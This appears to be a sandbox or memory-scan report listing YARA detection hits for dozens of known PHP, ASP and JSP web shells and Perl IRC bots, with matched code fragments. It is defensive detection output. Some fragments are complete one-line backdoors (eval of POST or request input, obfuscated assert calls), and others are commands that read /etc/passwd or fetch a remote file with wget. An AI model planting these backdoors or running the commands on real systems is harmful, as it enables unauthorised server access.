00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x2afa0:$s2: if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$stri
- 0x2afeb:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x2b02a:$s4: <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
- 0x2b066:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x5664c:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
- 0x2b0a6:$s9: <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 | Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php | Florian Roth | - 0x2b20f:$s1: <td><input size="48" value="$docr/" name="path" type="text"><input type=
- 0x2b25c:$s2: $uploadfile = $_POST['path'].$_FILES['file']['name'];
- 0x2b296:$s6: elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
- 0x2b2ce:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x4ac0a:$s7: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_c99shell_c99_w4cking_Shell_xxx | Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci | unknown | - 0x2b547:$s0: echo "<b>HEXDUMP:</b><nobr>
- 0x2b567:$s4: if ($filestealth) {$stat = stat($d.$f);}
- 0x2b594:$s5: while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$r
- 0x2b5e2:$s6: if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB
- 0x2b62e:$s8: echo "<center><b>Server-status variables:</b><br><br>";
- 0x2b66a:$s9: echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz | Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php | Florian Roth | - 0x2b86b:$s0: $this -> addFile($content, $filename);
- 0x2b896:$s3: function addFile($data, $name, $time = 0) {
- 0x2b8c6:$s8: function unix2DosTime($unixtime = 0) {
- 0x2b8f1:$s9: foreach($filelist as $filename){
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_c66_c99_shadows_mod_c99shell | Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php | Florian Roth | - 0x2baa0:$s2: if (unlink(_FILE_)) {@ob_clean(); echo "Thanks for using c99shell v.".$shv
- 0x2baf1:$s3: "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
- 0x2bb3a:$s4: <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#66
- 0x2bb8d:$s7: elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources
- 0x2bbdf:$s8: "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehos
- 0x2bc2f:$s9: elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 | Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp | Florian Roth | - 0x2be95:$s0: ""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
- 0x2bed9:$s4: out.println("<h2>File Manager - Current disk ""+(cr.indexOf("/") == 0?
- 0x2bf29:$s7: String execute = f.canExecute() ? "checked=\"checked\"" : "";
- 0x2bf6b:$s8: "<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp | Florian Roth | - 0x2c212:$s0: return new Double(format.format(value)).doubleValue();
- 0x2c24d:$s5: File tempF = new File(savePath);
- 0x2c272:$s9: if (tempF.isDirectory()) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_c99shell_c99_c99shell | Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php | Florian Roth | - 0x2c40d:$s2: $bindport_pass = "c99";
- 0x2c429:$s5: else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = tr
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x2c648:$s6: $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $d
- 0x2c694:$s7: $sql1 .= $row[1]."\r\n\r\n";
- 0x2c6b5:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x2c6f5:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx | Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x2c87d:$s3: BODY, TD, TR {
- 0x2c890:$s5: $d=str_replace("\\","/",$d);
- 0x2c8b1:$s6: if ($file=="." || $file=="..") continue;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_807_a_c5_config_css_dm_he1p_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x2ce60:$s3: String savePath = request.getParameter("savepath");
- 0x2ce98:$s4: URL downUrl = new URL(downFileUrl);
- 0x2cec0:$s5: if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
- 0x2cefd:$s6: String downFileUrl = request.getParameter("url");
- 0x2cf33:$s7: FileInputStream fInput = new FileInputStream(f);
- 0x2cf68:$s8: URLConnection conn = downUrl.openConnection();
- 0x2cf9b:$s9: sis = request.getInputStream();
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_icesword_job_ma1 | Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp | Florian Roth | - 0x2d161:$s1: <meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
- 0x2d1b1:$s3: <input type="hidden" name="_EVENTTARGET" value="" />
- 0x2d1ea:$s8: <input type="hidden" name="_EVENTARGUMENT" value="" />
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn | Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp | Florian Roth | - 0x2d479:$s0: <table width="100%" border="1" cellspacing="0" cellpadding="5" bordercol
- 0x2d4c6:$s2: KB </td>
- 0x2d4d4:$s3: <table width="98%" border="0" cellspacing="0" cellpadding="
- 0x2d514:$s4: <tr align="center">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY | Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php | Florian Roth | - 0x2d6e4:$s4: http://www.4ngel.net
- 0x33267:$s4: http://www.4ngel.net
- 0x4c5b5:$s4: http://www.4ngel.net
- 0x2d6fd:$s5: </a> | <a href="?action=phpenv">PHP
- 0x2d725:$s8: echo $msg=@fwrite($fp,$_POST['filecontent']) ? "
- 0x2d75a:$s9: Codz by Angel
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_locus7s_c99_w4cking_xxx | Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php | Florian Roth | - 0x2da3a:$s1: $res = @shell_exec($cfe);
- 0x2da58:$s8: $res = @ob_get_contents();
- 0x2da77:$s9: @exec($cfe,$res);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_browser_201_3_ma_ma2_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp | Florian Roth | - 0x2dc69:$s1: private static final int EDITFIELD_ROWS = 30;
- 0x2dc9b:$s2: private static String tempdir = ".";
- 0x2dcc4:$s6: <input type="hidden" name="dir" value="<%=request.getAttribute("dir")%>"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_c5_queryDong_spyjsp2010 | Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp | Florian Roth | - 0x2dec5:$s2: " <select name='encode' class='input'><option value=''>ANSI</option><option val
- 0x2df19:$s7: JSession.setAttribute("MSG","<span style='color:red'>Upload File Failed!</spa
- 0x2df6b:$s8: File f = new File(JSession.getAttribute(CURRENT_DIR)+"/"+fileBean.getFileName(
- 0x2dfbe:$s9: ((Invoker)ins.get("vd")).invoke(request,response,JSession);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57shell127_r57_kartal_r57 | Web Shell - from files r57shell127.php, r57_kartal.php, r57.php | Florian Roth | - 0x2e150:$s2: $handle = @opendir($dir) or die("Can't open directory $dir");
- 0x2e192:$s3: if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
- 0x2e1e3:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_con2 | Web shells - generated from file con2.asp | Florian Roth | - 0x2e312:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
- 0x2e368:$s10: j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input n
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_make2 | Web shells - generated from file make2.php | Florian Roth | - 0x2e496:$s1: error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_aaa | Web shells - generated from file aaa.asp | Florian Roth | - 0x2e5c2:$s0: Function fvm(jwv):If jwv=""Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt="
- 0x2e613:$s5: <option value=""DROP TABLE [jnc];exec mast"&kvp&"er..xp_regwrite 'HKEY_LOCAL
- 0x2e665:$s17: if qpv="" then qpv="x:\Program Files\MySQL\MySQL Server 5.0\my.ini"&br&
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Expdoor_com_ASP | Web shells - generated from file Expdoor.com ASP.asp | Florian Roth | - 0x2e793:$s4: ">www.Expdoor.com</a>
- 0x2e7ad:$s5: <input name="FileName" type="text" value="Asp_ver.Asp" size="20" max
- 0x2e7fb:$s10: set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '
- 0x2e83d:$s14: set fs=server.CreateObject("Scripting.FileSystemObject") '
- 0x2e87f:$s16: <TITLE>Expdoor.com ASP
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_php2 | Web shells - generated from file php2.php | Florian Roth | - 0x2e974:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_bypass_iisuser_p | Web shells - generated from file bypass-iisuser-p.asp | Florian Roth | - 0x2ea7f:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0x2eb8a:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
- 0x2ebb4:$s6: 'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
- 0x2ec05:$s7: //http://require.duapp.com/session.php
- 0x2ec30:$s8: if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
- 0x2ec80:$s12: //define('pass','123456');
- 0x2eca0:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_JSP | Web shells - generated from file JSP.jsp | Florian Roth | - 0x2edcd:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
- 0x2ee22:$s5: bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.app
- 0x2ee74:$s11: if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequest
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshell_123 | Web shells - generated from file webshell-123.php | Florian Roth | - 0x2efa3:$s0: // Web Shell!!
- 0x2efb6:$s1: @preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6
- 0x2effd:$s3: $default_charset = "UTF-8";
- 0x2f01d:$s4: // url:http://www.weigongkai.com/shell/
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_dev_core | Web shells - generated from file dev_core.php | Florian Roth | - 0x2f11d:$s1: if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {
- 0x2f15d:$s9: setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);
- 0x2f19c:$s10: $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'6874
- 0x2f1de:$s11: if (preg_match("/^HTTP\/\d\.\d\s([\d]+)\s.*$/", $status, $matches))
- 0x2f227:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C
- 0x2f271:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_pHp | Web shells - generated from file pHp.php | Florian Roth | - 0x2f39a:$s0: if(is_readable($path)) antivirus($path.'/',$exs,$matches);
- 0x2f3d9:$s1: '/(eval|assert|include|require|include\_once|require\_once|array\_map|arr
- 0x2f428:$s13: '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*
- 0x2f46f:$s14: '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+
- 0x2f4b8:$s19: '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_pppp | Web shells - generated from file pppp.php | Florian Roth | - 0x2f5de:$s0: Mail: chinese@hackermail.com
- 0x2f5ff:$s3: if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo
- 0x2f650:$s6: Site: http://blog.weili.me
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_code | Web shells - generated from file code.php | Florian Roth | - 0x2f749:$s1: <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_fi
- 0x2f795:$s7: $file = !empty($_POST["dir"]) ? urldecode(self::convert_to_utf8(rtrim($_PO
- 0x2f7e5:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
- 0x2f837:$s14: Processed in <span id="runtime"></span> second(s) {gzip} usage:
- 0x2f87c:$s17: <a href="javascript:;;;" name="{return_link}" onclick="fileperm
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_jspyyy | Web shells - generated from file jspyyy.jsp | Florian Roth | - 0x2f99e:$s0: <%@page import="java.io.*"%><%if(request.getParameter("f")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_xxxx | Web shells - generated from file xxxx.php | Florian Roth | - 0x2fab7:$s0: <?php eval($_POST[1]);?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_JJjsp3 | Web shells - generated from file JJjsp3.jsp | Florian Roth | - 0x2fbb4:$s0: <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!S
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x2fce1:$s0: <[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>
- 0x2fd2c:$s2: :https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
- 0x2fd6b:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_JJJsp2 | Web shells - generated from file JJJsp2.jsp | Florian Roth | - 0x2fe7b:$s2: QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z
- 0x2fecc:$s8: sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ
- 0x2ff19:$s10: ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData()
- 0x2ff59:$s11: return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase(
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_radhat | Web shells - generated from file radhat.asp | Florian Roth | - 0x3008a:$s1: sod=Array("D","7","S
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_asp1 | Web shells - generated from file asp1.asp | Florian Roth | - 0x3017d:$s0: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave
- 0x301b5:$s2: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_php6 | Web shells - generated from file php6.php | Florian Roth | - 0x302ca:$s1: array_map("asx73ert",(ar
- 0x302e7:$s3: preg_replace("/[errorpage]/e",$page,"saft");
- 0x30318:$s4: shell.php?qid=zxexp
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_xxx | Web shells - generated from file xxx.php | Florian Roth | - 0x3040a:$s3: <?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_GetPostpHp | Web shells - generated from file GetPostpHp.php | Florian Roth | - 0x30522:$s0: <?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_php5 | Web shells - generated from file php5.php | Florian Roth | - 0x30630:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_PHP | Web shells - generated from file PHP.php | Florian Roth | - 0x3075d:$s1: echo "<font color=blue>Error!</font>";
- 0x30788:$s2: <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILE
- 0x307d8:$s5: - ExpDoor.com</title>
- 0x307f4:$s10: $f=fopen($_POST["f"],"w");
- 0x30814:$s12: <textarea name="c" cols=60 rows=15></textarea><br>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0x30923:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
- 0x30953:$s2: Function MorfiCoder(Code)
- 0x30971:$s3: MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | perlbot_pl | Semi-Auto-generated - file perlbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30a63:$s0: my @adms=("Kelserific","Puna","nod32")
- 0x30a8e:$s1: #Acesso a Shel - 1 ON 0 OFF
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | php_backdoor_php | Semi-Auto-generated - file php-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30b62:$s0: http://michaeldaw.org 2006
- 0x4188e:$s0: http://michaeldaw.org 2006
- 0x41fb5:$s0: http://michaeldaw.org 2006
- 0x30b83:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- 0x30bcb:$s3: coded by z0mbie
- 0x3fddf:$s3: coded by z0mbie
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30cf1:$s0: <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</opt
- 0x2199b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x30c43:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x30d44:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x3faea:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x3fc0f:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x30d7c:$s2: echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Nshell__1__php_php | Semi-Auto-generated - file Nshell (1).php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30e75:$s0: echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($
- 0x30ec8:$s1: if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30fc7:$sAuthor: ShAnKaR
- 0x43c0f:$sAuthor: ShAnKaR
- 0x43c54:$sAuthor: ShAnKaR
- 0x30fd3:$s0: <input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input
- 0x31026:$s3: Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['b
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Casus15_php_php | Semi-Auto-generated - file Casus15.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3112c:$s0: copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na
- 0x3117e:$s2: echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'
- 0x311d2:$s3: value='Calistirmak istediginiz
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | small_php_php | Semi-Auto-generated - file small.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x239e6:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x312a4:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x312d2:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1
- 0x239c6:$s4: @ini_set('error_log',NULL);
- 0x31327:$s4: @ini_set('error_log',NULL);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shellbot_pl | Semi-Auto-generated - file shellbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x313f1:$s0: ShellBOT
- 0x313fe:$s1: PacktsGr0up
- 0x3140e:$s2: CoRpOrAtIoN
- 0x3141e:$s3: # Servidor de irc que vai ser usado
- 0x31447:$s4: /^ctcpflood\s+(\d+)\s+(\S+)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | fuckphpshell_php | Semi-Auto-generated - file fuckphpshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3151b:$s0: $succ = "Warning!
- 0x31532:$s1: Don`t be stupid .. this is a priv3 server, so take extra care!
- 0x31575:$s2: \*=-- MEMBERS AREA --=*/
- 0x31592:$s3: preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['o
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ngh_php_php | Semi-Auto-generated - file ngh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3167f:$s0: Cr4sh_aka_RKL
- 0x404d1:$s0: Cr4sh_aka_RKL
- 0x31691:$s1: NGH edition
- 0x404e6:$s1: NGH edition
- 0x316a1:$s2: /* connectback-backdoor on perl
- 0x316c5:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x404fc:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x316fe:$s4: $logo = "R0lGODlhMAAwAOYAAAAAAP////r
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | jsp_reverse_jsp | Semi-Auto-generated - file jsp-reverse.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x317d9:$s0: // backdoor.jsp
- 0x317ed:$s1: JSP Backdoor Reverse Shell
- 0x30b62:$s2: http://michaeldaw.org
- 0x3180c:$s2: http://michaeldaw.org
- 0x33e77:$s2: http://michaeldaw.org
- 0x41867:$s2: http://michaeldaw.org
- 0x4188e:$s2: http://michaeldaw.org
- 0x41f8e:$s2: http://michaeldaw.org
- 0x41fb5:$s2: http://michaeldaw.org
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Tool_asp | Semi-Auto-generated - file Tool.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x318ca:$s0: mailto:rhfactor@antisocial.com
- 0x318ed:$s2: ?raiz=root
- 0x318fc:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
- 0x31920:$s4: key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | NT_Addy_asp | Semi-Auto-generated - file NT Addy.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31a1e:$s0: NTDaddy v1.9 by obzerve of fux0r inc
- 0x31a47:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x41cc3:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x31a6c:$s4: RAW D.O.S. COMMAND INTERFACE
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php | Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31b85:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
- 0x31bba:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x31c0c:$s4: echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | RemExp_asp | Semi-Auto-generated - file RemExp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31d08:$s0: <title>Remote Explorer</title>
- 0x31d2b:$s3: FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFi
- 0x31d7d:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3da8b:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x4da3a:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phvayvv_php_php | Semi-Auto-generated - file phvayvv.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31e7f:$s0: {mkdir("$dizin/$duzenx2",777)
- 0x31ea1:$s1: $baglan=fopen($duzkaydet,'w');
- 0x31ec4:$s2: PHVayv 1.0
|
